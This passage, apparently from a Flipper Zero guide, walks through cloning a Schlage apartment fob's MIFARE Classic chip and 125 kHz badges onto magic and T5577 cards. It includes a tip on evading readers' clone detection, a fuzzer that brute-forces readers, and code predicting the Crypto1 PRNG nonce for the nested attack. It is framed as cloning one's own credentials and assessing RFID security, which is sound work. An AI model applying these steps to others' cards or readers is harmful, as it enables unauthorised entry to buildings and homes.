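def validate_nonce(nonce: int) -> bool:
    """True iff this PRNG could have produced `nonce`.  Hardened (EV1) chips use a real RNG,
    so their nonces fail this test; that is how tools tell the two apart."""
    return tag_nonce(state_from_nonce(nonce)) == nonce

def prng_successor(nonce: int, ticks: int) -> int:
    """Nonce the tag will emit `ticks` clocks after emitting `nonce`.  The nested attack knows
    roughly how many clocks separate the first (known-key) authentication from the nested one,
    so it can predict the second, encrypted nonce and recover keystream from it."""
    return tag_nonce(advance(state_from_nonce(nonce), ticks))

def nonce_space_size() -> int:
    """Number of distinct nonces the tag can ever produce: 2^16, not 2^32."""
    return len({tag_nonce(s) for s in range(1 << 16)})

if __name__ == "__main__":
    nt = tag_nonce(0x1234)      # constructed starting state
    print(f"nT = {nt:08X}  valid = {validate_nonce(nt)}  corrupted valid = {validate_nonce(nt ^ 1)}")
    print(f"nonce 40 clocks later = {prng_successor(nt, 40):08X}")
    print(f"distinct nonces: {nonce_space_size()} of {1 << 32}")
```

Two things to take from running it: validate_nonce() is the test that tells a plain MIFARE Classic card from a hardened one whose nonces do not satisfy the LFSR relation, and prng_successor() is how the nested attack predicts the card's next nonce from the elapsed clock ticks, which is what turns the encrypted nonce into known keystream.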
Step 2.6: Save the Complete Card Dump — ⏱️ 10 seconds
Save when prompted — After a full read (32/32 keys, 16/16 sectors), the Flipper asks to save. Name it Schlage_Apartment (overwrite the old partial file or use a new name like Schlage_Apt_Full).
File location — Saved to /ext/nfc/Schlage_Apartment.nfc on the SD card. This file contains the complete card dump: all 16 sectors of data, all 32 keys, and the UID. This is everything you need.
Step 2.7: Test — Emulate on Flipper — ⏱️ 5 seconds
Navigate to NFC → Saved → Schlage_Apartment → Emulate — The Flipper now pretends to be your 9691T's MIFARE Classic chip.
Hold the Flipper against the Schlage door reader — Center of the Flipper's back against the reader, flat and flush. Try different angles if it doesn't work on the first try. The NFC antenna sweet spot is the center.
If the door opens: 🎉 SUCCESS! — Emulation works! You can stop here if you're happy using the Flipper as your key. To also make a physical card clone, continue to Step 2.8.

If the door doesn't open: Flipper emulation can be too slow for some Schlage readers. Don't worry — a physical magic card (Step 2.8) has a much higher success rate because it uses real MIFARE silicon.
Step 2.8: Write to Magic NFC Card — ⏱️ 30 seconds
Get your magic card ready — A Gen1a, Gen2 (CUID), or Gen4 UID-changeable MIFARE Classic 1K card. If your fob's UID was 4 bytes, Gen1a or Gen2 works. If 7 bytes, you need Gen4.
Navigate to NFC → Saved → Schlage_Apartment → Write — Select the Write option.
Place the magic card on the center of the Flipper's back — Same position as reading. The Flipper writes ALL sector data (all 16 sectors, all keys, all block data) PLUS the UID to the magic card.
"Write Success" — Takes 5-15 seconds. Your magic card is now an exact byte-for-byte clone of the 9691T's MIFARE Classic chip.
Test at your apartment door — Tap the magic card against the Schlage reader. It should unlock the door exactly like the original fob.

Troubleshooting the magic card:

  • Reader rejects the magic card — If you used Gen1a and the reader does Gen1a detection (sends a magic wakeup command), the reader knows it's a clone. Try a Gen2 (CUID) card — these are not detectable by the Gen1a detection method.
  • Write failed — Bad magic card or wrong type. Try another card from the pack. Make sure it's actually a UID-changeable card, not a regular MIFARE Classic (which has read-only Block 0).
  • Everything written but door still doesn't open — Double-check that all 32 keys were recovered (re-read the original fob and verify 32/32). If some sectors were partially read, the clone will be incomplete.
✅ Part 2 Done!
You now have a full clone of the apartment door side. Between Part 1 (T5577 for building entrance) and Part 2 (magic NFC card for apartment), you've fully cloned the Schlage 9691T.

🎯 What You End Up With

Clone Method | What Opens | Pros | Cons
Flipper Emulation (RFID) | Building entrance, garage, common areas | No extra cards needed, always with you | Need to navigate Flipper menus each time
T5577 Card | Building entrance, garage, common areas | Just tap and go, works like original | Extra card to carry
Flipper Emulation (NFC) | Apartment door | No extra cards needed | May not work on some picky Schlage readers
Magic NFC Card | Apartment door | 100% hardware compatibility, just tap | $2-5 per card
T5577 + S50 Combo Fob | BOTH building entrance AND apartment door | Single fob replaces both functions | $5-15, need to write both sides

🔧 Troubleshooting Reference

Problem | Likely Cause | Solution
NFC read detects nothing | Fob positioned wrong | NFC antenna is CENTER of Flipper's back — hold fob flat and centered
RFID read detects nothing | Fob positioned wrong | RFID antenna is BOTTOM EDGE of Flipper — hold fob against the short bottom edge
0 keys after dictionary attack | Non-default keys (normal for Schlage) | Continue to Extract MF Keys step — the real keys come from the door reader
0 nonces from Extract MF Keys | Bad positioning on reader | Move Flipper slowly across the reader face, try different positions
MFKey finds 0 new keys | Not enough nonces, or corrupted capture | Go back and collect more nonces — hold Flipper against reader for longer
Stuck at partial keys after 3+ rounds | Some sectors need nested attack | Use Apps → NFC → Mifare Nested with the live fob on the Flipper
Emulation doesn't open the door | Reader timing too strict for emulation | Use a physical magic card (Gen1a/Gen2/Gen4) instead
Magic card rejected by reader | Gen1a detection by reader | Switch to Gen2 (CUID) or Gen4 card
Door opened during Extract MF Keys | Reader uses UID-only auth (very insecure) | Good news: cloning is easier! Just UID emulation may be enough — save and emulate
T5577 doesn't work at building entrance | Wrong protocol written, or reader is NFC not RFID | Re-read the original fob with RFID → Read, verify protocol, re-write T5577

💡 Tips & Tricks

  • Antenna positions matter most — This is the #1 source of failed attempts. Remember: NFC = center back, RFID = bottom edge. Getting this wrong wastes time.
  • Don't interrupt the dictionary attack — Let it run all the way through. It tries every key in the dictionary. Interrupting means you miss potential key matches.
  • More nonces = better — When at the door reader, collect as many nonces as you can. 10+ nonces is ideal. More data gives MFKey more chances to crack each key.
  • The combo fob option is slick — If you buy a "T5577 + MIFARE S50" dual-frequency fob, you can write BOTH the 125 kHz and 13.56 MHz data to a single fob. One fob for everything, just like the original 9691T.
  • Keep your original fob safe — Don't lose it until you've verified your clones work everywhere. If you need to re-read or re-do any steps, you'll need the original.
  • Check the .nfc file — The saved file at /ext/nfc/Schlage_Apartment.nfc is plain text; open it from the SD card on a computer. The UID: line tells you whether the UID is 4 or 7 bytes. Depending on the firmware's dump format version, keys appear either on Key A: / Key B: lines or inside each sector's trailer block (Block 3, 7, 11 ... 63: Key A is the first 6 bytes, Key B the last 6). Any ?? in a block is data the Flipper has not been able to read yet; ?? inside a trailer's key bytes means that key is still uncracked.
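To do that check without reading the file by eye, here is an added example (my code, not the Flipper's or Momentum's): a small auditor for a saved MIFARE Classic 1K dump. It assumes the Block N: layout that current firmware writes (Data format version 2), the header fields shown in the constructed sample, and that unread bytes appear as ??; the function names are mine. The sample dump is constructed, with sector 0 complete, sector 1 missing Key B and sector 2 unread, and blocks for sectors 3-15 omitted.

```python
# Added example (not Momentum/Flipper code): audit a saved Mifare Classic 1K .nfc dump before
# writing it to a magic card.  Parses the "Block N:" layout current firmware writes (Data format
# version 2); header fields and the treatment of missing lines are assumptions.  Unknown bytes
# are written as "??".
import re

BLOCKS_PER_SECTOR = 4   # 1K layout: 16 sectors x 4 blocks x 16 bytes
SECTORS_1K = 16

# Constructed sample: sector 0 complete, sector 1 missing Key B, sector 2 unread.
# Blocks for sectors 3-15 are omitted; the parser treats absent blocks as unread.
SAMPLE_DUMP = """\
Filetype: Flipper NFC device
Version: 4
Device type: Mifare Classic
UID: AB CD EF 12
ATQA: 00 04
SAK: 08
Mifare Classic type: 1K
Data format version: 2
Block 0: AB CD EF 12 9B 08 04 00 62 63 64 65 66 67 68 69
Block 1: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 2: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 3: A0 A1 A2 A3 A4 A5 78 77 88 69 B0 B1 B2 B3 B4 B5
Block 4: 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF 00
Block 5: ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
Block 6: ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
Block 7: A0 A1 A2 A3 A4 A5 78 77 88 69 ?? ?? ?? ?? ?? ??
Block 8: ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
Block 9: ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
Block 10: ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
Block 11: ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
"""

def parse_dump(text: str):
    """Return (uid bytes, {block_number: [int or None per byte]}); None marks a '??' byte."""
    uid = b""
    blocks = {}
    for line in text.splitlines():
        if line.startswith("UID:"):
            uid = bytes.fromhex(line.split(":", 1)[1].replace(" ", ""))
        m = re.match(r"Block (\d+): (.*)", line)
        if m:
            cells = m.group(2).split()
            blocks[int(m.group(1))] = [None if c == "??" else int(c, 16) for c in cells]
    return uid, blocks

def audit_dump(text: str) -> dict:
    """Summarise what is still missing from a 1K dump and check block 0 against the UID."""
    uid, blocks = parse_dump(text)
    unread = lambda b: b is None or any(x is None for x in b)
    keys_found, sectors_complete, missing = 0, 0, []
    for s in range(SECTORS_1K):
        first = s * BLOCKS_PER_SECTOR
        trailer = blocks.get(first + 3)          # sector trailer: Key A | access bits | Key B
        key_a_ok = trailer is not None and None not in trailer[0:6]
        key_b_ok = trailer is not None and None not in trailer[10:16]
        keys_found += key_a_ok + key_b_ok
        data_ok = all(not unread(blocks.get(first + i)) for i in range(BLOCKS_PER_SECTOR))
        sectors_complete += data_ok
        if not (key_a_ok and key_b_ok and data_ok):
            missing.append(s)
    # 4-byte UID cards: block 0 = UID[0..3], BCC (XOR of the UID bytes), SAK, ATQA, vendor data.
    # A mismatch here means the dump was edited or mixed up; 7-byte UID cards lay block 0 out
    # differently and are simply reported as not checked (False).
    block0 = blocks.get(0)
    bcc = 0
    for x in uid:
        bcc ^= x
    block0_ok = (
        block0 is not None and not unread(block0)
        and len(uid) == 4 and bytes(block0[:4]) == uid and block0[4] == bcc
    )
    return {
        "uid_len": len(uid),
        "magic_card_needed": "Gen1a/Gen2 (4-byte UID)" if len(uid) == 4 else "Gen4 (7-byte UID)",
        "keys_found": keys_found,              # out of 32
        "sectors_complete": sectors_complete,  # out of 16
        "incomplete_sectors": missing,
        "block0_matches_uid": block0_ok,
    }

if __name__ == "__main__":
    for k, v in audit_dump(SAMPLE_DUMP).items():
        print(f"{k}: {v}")
```

Run it against your own dump by replacing SAMPLE_DUMP with the file contents; a clone written from a dump whose incomplete_sectors list is not empty will be missing those sectors on the magic card.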
Legal Reminder
Only clone access cards that belong to you or that you have explicit authorization to duplicate. Cloning someone else's access card without permission is illegal. This guide is for cloning your own apartment fob.
🔑 125 kHz RFID

Low-frequency RFID for building access cards, hotel keys, and animal tracking chips. Simpler than NFC — most 125 kHz cards have zero encryption, making them trivially copyable. This section covers how the technology works, every supported protocol, the universal T5577 blank card, and real security implications.

🔬 How 125 kHz RFID Actually Works
The Physics — Electromagnetic Coupling at 125 kHz
Beginner

125 kHz RFID uses electromagnetic induction — the same principle as a wireless phone charger, but instead of transferring power to charge a battery, it transfers just enough power to wake up a tiny chip and make it broadcast its ID.

How the Read Process Works
The reader (or the Flipper) generates a 125 kHz electromagnetic field from its antenna coil
When a passive RFID tag enters this field (within ~5-10 cm), the field induces a current in the tag's antenna coil — powering the chip with no battery
The chip wakes up and modulates the field by changing its antenna's load. This creates tiny ripples in the field that the reader detects.
These ripples encode the tag's ID number — transmitted as a simple bitstream using ASK (Amplitude Shift Keying) or FSK/PSK modulation
The reader decodes the bitstream and extracts the ID. That's it — no encryption, no challenge-response, no mutual authentication. Just a number broadcast in the clear.
125 kHz vs NFC (13.56 MHz) — Key Differences
Property | 125 kHz RFID | 13.56 MHz NFC
Read Range | 5–10 cm (30 cm+ with a large long-range reader antenna) | 1–4 cm typical
Encryption | None (tag just broadcasts ID) | Optional (Crypto1, DESFire AES, etc.)
Complexity | Simple — ID only | Complex — sectors, keys, apps
Speed | Slow (low data rate) | Fast (high data rate)
Flipper Hardware | Software-defined on MCU (no dedicated chip!) | ST25R3916 NFC IC
Antenna Location | Bottom edge of Flipper | Center back of Flipper
Cost Per Tag | $0.10–0.50 | $0.30–2.00
Interesting Detail
The Flipper's 125 kHz RFID implementation is entirely software-defined: there is no dedicated RFID chip. The STM32WB55 drives the antenna coil from a timer and recovers the tag's load-modulated response through a small analog front end, its on-chip comparator and timer capture. That keeps the BOM cost down while supporting 20+ protocols.
📻 Built-in Features
📖 Read — Auto-Detect & Read
Beginner

Place any 125 kHz card/fob on the bottom edge of the Flipper. It auto-detects the protocol and reads the ID.

  • Detection takes 1-5 seconds depending on card type
  • Shows protocol name, ID number, and raw data
  • Save to SD card for later emulation or cloning
  • Antenna is on the bottom edge — NOT the back like NFC
Tip
If Read doesn't detect anything, try Read → Extra → Read ASK or Read PSK for less common modulation types. Some protocols use PSK (Phase Shift Keying) instead of the default ASK.
📤 Saved — Emulate Tags
Beginner

Emulate any saved 125 kHz card. Flipper generates the exact radio response a real card would.

  • Place Flipper directly on the reader (close contact required for 125 kHz)
  • Emulation starts immediately — Flipper modulates its antenna coil to mimic the tag
  • Works with all supported protocols
  • Multiple cards saved on one Flipper = all your access cards in one device
Note
125 kHz emulation range is short. Hold the Flipper's bottom edge within 1-3 cm of the reader, ideally touching it. Some readers need a specific angle; try rotating slowly.
✏️ Add Manually
Intermediate

Create RFID tags from known data without reading a physical card. Enter protocol, ID, and data manually.

  • Select protocol from the full list (EM4100, HID, Indala, etc.)
  • Enter the ID value in the expected format
  • Useful when you know the ID from documentation, database dumps, or other tools
  • Saves like a normal read — can emulate or write to T5577
🎲 LFRFID Fuzzer (Momentum)
Advanced🐬🐬🐬

Brute force RFID readers by emulating cards with random or sequential UIDs. Tests how access control systems respond to unknown cards.

  • Select protocol (EM4100, HID, etc.)
  • Choose attack type: random UIDs, sequential, or custom range
  • Flipper rapidly emulates cards while you hold it to the reader
  • If the reader opens — you found a valid ID
Attack Types
Mode | Description | Speed
Sequential | Tries IDs in order (0001, 0002, 0003...) | Slow but thorough
Random | Tries random IDs from full range | Good for testing reader behavior
Custom Range | IDs within a specific range you define | Fastest if you know the ID range
Warning
This generates hundreds of failed authentication attempts. Most security systems will log these. Some may trigger lockout or alarm. Only test systems you own or have explicit authorization to test.
📊 Raw Read / Emulate (Momentum)
Advanced🐬🐬

Capture and replay raw modulation data without protocol decoding. Similar to Sub-GHz Read RAW — records the exact modulation pattern.

  • Useful for unknown or unsupported 125 kHz protocols
  • Captures ASK or PSK modulation patterns
  • Can be replayed directly — Flipper reproduces the exact modulation
  • Good for analysis: export the raw data and examine the bitstream
📋 125 kHz RFID Protocol Encyclopedia
🔑 Complete Protocol Encyclopedia — All 24 Protocols
Intermediate

Every 125 kHz RFID protocol supported by Flipper Zero + Momentum firmware. None of these have encryption — every tag just broadcasts its ID in the clear.

Protocol | Bits | Security | Cloneable | Common Uses
EM4100 | 64 (40-bit ID) | 🔴 None | ✅ T5577 | Most common worldwide — generic access cards, hotel key cards, gym fobs
EM4100/32 | 32 | 🔴 None | ✅ T5577 | 32-bit variant of EM4100
EM4100/16 | 16 | 🔴 None | ✅ T5577 | 16-bit variant of EM4100
HID H10301 | 26 (Wiegand) | 🔴 None | ✅ T5577 | HID ProxCard II — most widely deployed access system in North America. Corporate offices, universities.
HID ProxII Generic | Various | 🔴 None | ✅ T5577 | Extended HID formats beyond 26-bit. Corporate access, government.
HID Corporate 1000 | 35 | 🔴 None | ✅ T5577 | Large enterprise HID deployments
Indala 26 | 26 | 🔴 None | ✅ T5577 | Motorola/HID Indala format — government buildings, military facilities, secure sites
AWID | 26 | 🔴 None | ✅ T5577 | Applied Wireless ID — corporate access control
FDX-A | - | 🔴 None | ✅ T5577 | ISO 11784 animal identification (older standard)
FDX-B | 128 | 🔴 None | ✅ T5577 | ISO 11785 animal identification — pet microchips (dogs, cats), livestock tracking. Read your pet's chip ID!
Kantech ioProx | 26/36 | 🔴 None | ✅ T5577 | Kantech access control systems
Viking | - | 🔴 None | ✅ T5577 | Viking access control systems
Jablotron | 40 | 🔴 None | ✅ T5577 | Czech security alarm systems
Paradox | 44 | 🔴 None | ✅ T5577 | Paradox security systems
PAC/Stanley | - | 🔴 None | ✅ T5577 | PAC International access control (UK, Europe)
Keri | - | 🔴 None | ✅ T5577 | Keri Systems access control
GProxII | 36 | 🔴 None | ✅ T5577 | Guardall ProxII security systems
Gallagher | - | 🔴 None | ✅ T5577 | Gallagher security — very common in New Zealand and Australia
Pyramid | 26 | 🔴 None | ✅ T5577 | Farpointe Data access control
NexWatch | - | 🔴 None | ✅ T5577 | Honeywell NexWatch access control
Securakey | - | 🔴 None | ✅ T5577 | Securakey access control systems
Noralsy | - | 🔴 None | ✅ T5577 | French access control systems
EM-Micro EM4305 | - | 🔴 None | ✅ T5577 | Programmable transponder (similar to T5577 but from EM Microelectronic)
IdTeck | 26 | 🔴 None | ✅ T5577 | Korean access control systems
The Brutal Truth
Every single 125 kHz RFID protocol has 🔴 None security. There is no encryption, no challenge-response, no authentication. The tag simply broadcasts its ID when powered by any reader field. Anyone with a $3 reader can clone any card in seconds. The only "security" is physical proximity to the card.
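To make the "no security" column concrete, here is an added example (not Flipper or Momentum code) that builds and validates the 64-bit frame an EM4100 tag repeats: a 9-bit header, the 40-bit ID as ten nibbles each followed by an even parity bit, four column-parity bits and a stop bit. Parity is the only integrity check in the frame; there is no secret anywhere, so any reader that can see the bits can reconstruct the ID. The ID used is the one from the CLI examples on this page; the bit layout is the public EM4100 format.

```python
# EM4100 64-bit frame encoder/decoder (added example, not Flipper or Momentum code).
# Layout: 9 header ones, 10 x (4 data bits + even row parity), 4 column parity bits, stop 0.

HEADER = [1] * 9  # the body can never contain nine consecutive ones, so readers sync on this

def em4100_encode(card_id: int) -> list:
    """Return the 64 bits an EM4100 tag with this 40-bit ID transmits, MSB first."""
    if not 0 <= card_id < (1 << 40):
        raise ValueError("EM4100 IDs are 40 bits")
    nibbles = [(card_id >> (4 * (9 - i))) & 0xF for i in range(10)]
    bits = list(HEADER)
    for n in nibbles:
        row = [(n >> 3) & 1, (n >> 2) & 1, (n >> 1) & 1, n & 1]
        bits += row + [sum(row) % 2]                                  # even parity per row
    for col in range(4):
        bits.append(sum((n >> (3 - col)) & 1 for n in nibbles) % 2)  # even parity per column
    bits.append(0)                                                    # stop bit
    return bits

def em4100_decode(bits: list):
    """Validate a 64-bit frame and return the 40-bit ID, or None if any check fails."""
    if len(bits) != 64 or bits[:9] != HEADER or bits[63] != 0:
        return None
    nibbles = []
    for i in range(10):
        row = bits[9 + 5 * i : 9 + 5 * i + 4]
        if sum(row) % 2 != bits[9 + 5 * i + 4]:
            return None                                               # row parity error
        nibbles.append((row[0] << 3) | (row[1] << 2) | (row[2] << 1) | row[3])
    for col in range(4):
        if sum((n >> (3 - col)) & 1 for n in nibbles) % 2 != bits[59 + col]:
            return None                                               # column parity error
    card_id = 0
    for n in nibbles:
        card_id = (card_id << 4) | n
    return card_id

def em4100_from_stream(stream: list):
    """A tag loops the frame forever; a reader locks on by finding the header anywhere
    in a continuous bit stream. Returns the first frame that validates, else None."""
    doubled = stream + stream            # lets a frame wrap around the end of the capture
    for start in range(len(stream)):
        if doubled[start:start + 9] == HEADER:
            card_id = em4100_decode(doubled[start:start + 64])
            if card_id is not None:
                return card_id
    return None

if __name__ == "__main__":
    frame = em4100_encode(0x6A01234567)   # ID from the CLI examples on this page
    print("".join(map(str, frame)))
    print(hex(em4100_decode(frame)))
```

Feeding `em4100_from_stream` a demodulated bit capture (for instance the bitstream exported from Raw Read) shows why the Fuzzer works at all: the reader accepts whatever ID passes parity, and parity is trivially satisfied by construction.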
💻 CLI Commands
Command | Description | Example
rfid read | Read any 125 kHz card | rfid read normal
rfid write | Write data to a T5577 card | rfid write EM4100 6A01234567
rfid emulate | Emulate an RFID tag | rfid emulate EM4100 6A01234567
rfid raw_read | Read raw modulation data | rfid raw_read ask /ext/rfid/raw.rfid
rfid raw_emulate | Emulate raw data | rfid raw_emulate /ext/rfid/raw.rfid
💳 T5577: The Universal Blank Card
💳 T5577: The Universal 125 kHz Blank Card
Beginner🐬🐬🐬🐬

The T5577 (also called T5567/T55x7) is a programmable 125 kHz RFID transponder that can emulate virtually any 125 kHz protocol. It's the "magic card" equivalent for low-frequency RFID — and after 20+ years, nothing has superseded it.

What Makes It Special

  • Can be programmed to emulate EM4100, HID, Indala, AWID, Paradox, FDX-B, Gallagher, and many more
  • Re-writable unlimited times — clone one card today, a different card tomorrow
  • Costs $0.50–2 per unit on AliExpress, Amazon, or lab401.com
  • Available as cards, keyfobs, wristbands, stickers, and implantable capsules
  • Has been the universal RFID blank since the early 2000s — still unmatched

Memory Architecture

Understanding T5577's blocks helps when troubleshooting failed clones:

Block 0 | ⚙️ Configuration | Modulation, bit rate, data blocks, max block
Block 1 | 📦 Data | ID data (first 32 bits)
Block 2 | 📦 Data | ID data (continued)
Block 3 | 📦 Data | Extended data (if needed)
Block 4–6 | 📦 Data | Additional storage (protocol-dependent)
Block 7 | 🔒 Password | Optional write protection (32-bit password)

Block 0 is the key — it configures the modulation type (ASK, FSK, PSK), bit rate, and how many data blocks to transmit. When the Flipper writes a protocol to a T5577, it sets Block 0 to match that protocol's parameters. When programmed as EM4100, a T5577 IS an EM4100 card to any reader.

How to Clone

Read the original card — RFID → Read. Hold the card on the Flipper's bottom edge.
Save it to your SD card with a descriptive name
Go to Saved → [your card] → Write
Place the blank T5577 on the Flipper's bottom edge. Wait for the "Success" confirmation (takes 1-2 seconds).
# CLI method
rfid read normal                 # Read the original card
rfid write EM4100 6A01234567     # Write EM4100 ID to T5577
rfid write HID_ProxII 000CA80F   # Write HID format to T5577

Where to Buy

Form Factor | Price Range | Best For
Standard card (ISO) | $0.50–1.50 ea | Building access, wallet carry
Keyfob | $0.50–2 ea | Keychain carry, gym/pool
Wristband | $1–3 ea | Hands-free access
Sticker/Coin tag | $0.30–1 ea | Stick inside phone case or badge
Dual-frequency fob (T5577 + MIFARE) | $5–15 ea | Buildings with both 125 kHz and NFC readers
Where to Buy
Search Amazon for "T5577 RFID card writable" or "T5577 keyfob". AliExpress has the best prices ($0.30–0.80 per card in bulk). Lab401.com specializes in security testing gear. Important: make sure they specify T5577 chip — avoid "EM4100 cards" which are read-only pre-programmed tags.
🎯 Novel & Creative RFID Uses
🐾
Read Your Pet's Microchip
Pet microchips use FDX-B (ISO 11785). Hold your dog or cat near the Flipper's bottom edge — it reads the implanted 15-digit ID number. Verify your pet's registration info matches.
🐬🐬🐬🐬
🏢
Consolidate Access Cards
Read all your building access cards (office, gym, parking) and save them on one Flipper. Switch between emulated cards instead of carrying a stack of fobs.
🐬🐬🐬🐬🐬
🏨
Read Hotel Key Cards
Many budget hotels still use 125 kHz EM4100 cards. Read yours to see what protocol it uses. Some can be backed up to a T5577 in case you lose the original.
🐬🐬🐬
🅿️
Clone Parking Garage Cards
Many parking garages use simple EM4100 or HID cards. Clone to a T5577 as a backup, or transfer to a more convenient form factor (keyfob instead of card).
🐬🐬🐬🐬
🔍
Identify Unknown Cards
Got a card and don't know what it's for? Hold it to the Flipper — it'll tell you the protocol, ID, and raw data. Quick way to figure out if it's 125 kHz or you need NFC.
🐬🐬🐬
🚗
Vehicle Immobilizer Analysis
Some older cars (pre-2005) use 125 kHz transponders in the key for immobilizer verification. The Flipper can read these transponder IDs for analysis.
🐬🐬
🛡️ Security Assessment — Why 125 kHz RFID Is Broken
⚠️ The State of 125 kHz Security
Beginner

125 kHz RFID access control is fundamentally broken from a security standpoint. Here's why:

🔴 Zero Encryption
The tag broadcasts its ID in plaintext. No challenge-response, no session keys, no mutual authentication. It's like a password written on the front of the card.
🔴 Trivial Cloning
Anyone with a $3 handheld cloner (available on AliExpress/Amazon) can read and clone any 125 kHz card in under 5 seconds. No technical skill required.
🔴 Extended Read Range
While normal read range is 5-10 cm, attackers with directional or amplified antennas can extend this to 30+ cm — enough to read a card in someone's pocket or bag.
🟡 No Tamper Detection
Readers can't tell the difference between an original card and a clone. There's no way to detect that a card has been duplicated.
🟡 Widespread Deployment
Despite being broken, 125 kHz systems are still the most common access control in budget buildings, apartment complexes, gyms, and parking garages worldwide.
💡 Upgrade Path
Secure alternatives exist: HID iCLASS SE (13.56 MHz + encrypted), SEOS (PKI-based), MIFARE DESFire EV2/EV3 (AES-128), or mobile credentials (phone-based BLE/NFC).
Bottom Line
If your building uses 125 kHz RFID as its only access control, it has effectively no security beyond "you need to be physically near someone's card for a few seconds." This is a known, accepted reality in the security industry. If security matters, migrate to 13.56 MHz with encryption (DESFire or SEOS).
🗝️ iButton — The Contact Key That's Everywhere

A coin-shaped metal key containing a tiny microchip. Also called "Dallas Touch Memory" or "contact memory" — used in apartment intercoms, building access, elevators, and parking garages worldwide. Not magnetic, despite what everyone calls them. The Flipper can read, emulate, write, and fuzz all three iButton protocols.

🔍 What is iButton?
Beginner

iButton is a stainless steel coin (~16mm diameter) that contains a tiny chip with a unique ID. It was invented by Dallas Semiconductor (now Maxim/Analog Devices) and is extremely common in Europe, Russia, and parts of Asia and South America for building access.

Physical Contacts

  • Center pad = DATA+ (signal line)
  • Outer ring = GND (ground)
  • Just two contacts — that's all it takes
┌─────────────────────────┐
│     Stainless Steel     │
│   ┌─────────────────┐   │
│   │    Microchip    │   │
│   │   (8-byte ID)   │   │
│   └─────────────────┘   │
│                         │
├───────┬─────────┬───────┤
│  GND  │  DATA+  │  GND  │
└───────┴─────────┴───────┘
  Outer   Center    Outer
  Ring     Pad      Ring

⌀ ~16mm • No battery • Powered by reader

Where You'll Find Them

  • Apartment intercoms and building entrances
  • Elevator access control
  • Parking garages and gates
  • Hotel room locks (older systems)

Beyond Access Control

  • DS18B20 — temperature sensors (same 1-Wire protocol)
  • DS1904 — real-time clocks
  • DS1963S — SHA-1 crypto iButtons (banking/vending)
Myth Buster
Despite being commonly called "magnetic keys," iButtons have zero magnetism. They're purely electrical contact devices. The confusion comes from their metal appearance and the way you press them against readers.
How It Physically Works
Beginner

The key has no battery — it's entirely powered by the reader the instant you make contact.

You press the key against the reader. Two metal surfaces touch: center pad → data line, outer rim → ground.
The reader provides 2.8–6V power through a 1kΩ pull-up resistor on the data line.
The chip inside wakes up instantly and announces its presence with a "presence pulse."
The reader sends a ROM command asking for the ID.
The chip transmits its 8-byte ID over the same single wire — family code + serial + CRC.
The reader checks the ID against its database. If it matches — the door opens. Total time: ~10–20ms.
Key Insight
Everything happens over one wire. Power, data in, data out — all on a single conductor. This is the 1-Wire protocol, and it's why iButton only needs two contacts (data + ground).
📡 The 1-Wire Protocol
📊 1-Wire Protocol — How Data Moves on One Wire
Intermediate

The 1-Wire protocol is beautifully minimal. A single wire handles power delivery AND bidirectional data using precise timing of voltage pulses.

The Roles

  • Master (reader) — initiates all communication, provides power
  • Slave (key/sensor) — responds only when spoken to

Data Encoding: It's All About Timing

Data bits are encoded by how long the line is pulled low:

  • Reset pulse: Master pulls line low for 480μs → slave responds with a "presence pulse" (I'm here!)
  • Write 0: Pull low for 60μs (long = zero)
  • Write 1: Pull low for <15μs then release (short = one)
  • Read: Master pulls low briefly, slave either holds low (0) or lets it float high (1)
Communication Sequence

Reader (Master)                    Key (Slave)
      │                                 │
      │── Reset (480μs low) ───────────▶│
      │                                 │
      │◀── Presence Pulse ──────────────│  "I'm here"
      │                                 │
      │── ROM Command 0x33 ────────────▶│  "Tell me your ID"
      │                                 │
      │◀── 8 bytes: ID data ────────────│  family + serial + CRC
      │                                 │
      │── Match/Skip ROM ──────────────▶│  (for data commands)
      │                                 │

Timing Windows

Operation | Duration | What Happens
Reset | 480μs low | Master resets bus, all slaves listen
Presence | 60–240μs low | Slave pulls low to say "I exist"
Write 1 | <15μs low | Short pulse = logical 1
Write 0 | 60μs low | Long pulse = logical 0
Read slot | ~60μs total | Master samples at 15μs mark
Full ID transfer | ~10–20ms | Reset + ROM cmd + 64 bits
Parasitic Power
When the data line is high (idle), the slave chip charges an internal capacitor. This stored energy powers the chip during low pulses when the line is pulled to ground. No battery needed — ever.
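The timing table above is enough to decode a bus capture by hand, and the following added example (not Flipper or Momentum code) does it in software: it takes the widths of the low pulses a logic analyser would record on the single wire and turns them back into reset, presence and data bytes. The one detail the table does not state is bit order: 1-Wire sends each byte least-significant bit first, so the bits must be packed in that order to recover the ROM bytes as Flipper displays them. The pulse widths used for the sample transaction (6μs for a 1, 60μs for a 0, 480μs reset, 120μs presence) are chosen from the windows above; the ROM value is the example ID used later on this page.

```python
# 1-Wire pulse-width decoder (added example, not Flipper or Momentum code).
# Input: low-pulse widths in microseconds, in bus order. Output: decoded events.

RESET_MIN_US = 480     # master reset: 480us or longer
WRITE_1_MAX_US = 15    # a low pulse shorter than this is a logical 1

def encode_bytes_as_pulses(data: bytes, one_us=6, zero_us=60):
    """Master-side view of writing bytes: one low pulse per bit, LSB of each byte first."""
    pulses = []
    for byte in data:
        for bit in range(8):
            pulses.append(one_us if (byte >> bit) & 1 else zero_us)
    return pulses

def read_rom_transaction(rom: bytes, reset_us=480, presence_us=120):
    """Pulse widths for a full ID read: reset, presence, READ ROM (0x33), then the 8 ROM bytes.
    Constructed for this example; a real capture would also show idle gaps between slots."""
    return [reset_us, presence_us] + encode_bytes_as_pulses(b"\x33" + rom)

def decode_pulses(low_us):
    """Return a list of ('reset',), ('presence',), ('data', bytes) events."""
    events, bits = [], []
    expect_presence = False

    def flush():
        if bits:
            out = bytearray()
            for i in range(0, len(bits) - len(bits) % 8, 8):      # drop a trailing partial byte
                out.append(sum(b << k for k, b in enumerate(bits[i:i + 8])))  # LSB first
            events.append(("data", bytes(out)))
            bits.clear()

    for width in low_us:
        if width >= RESET_MIN_US:
            flush()
            events.append(("reset",))
            expect_presence = True
        elif expect_presence:
            # Simplification: the first low pulse after a reset (60-240us) is taken as the
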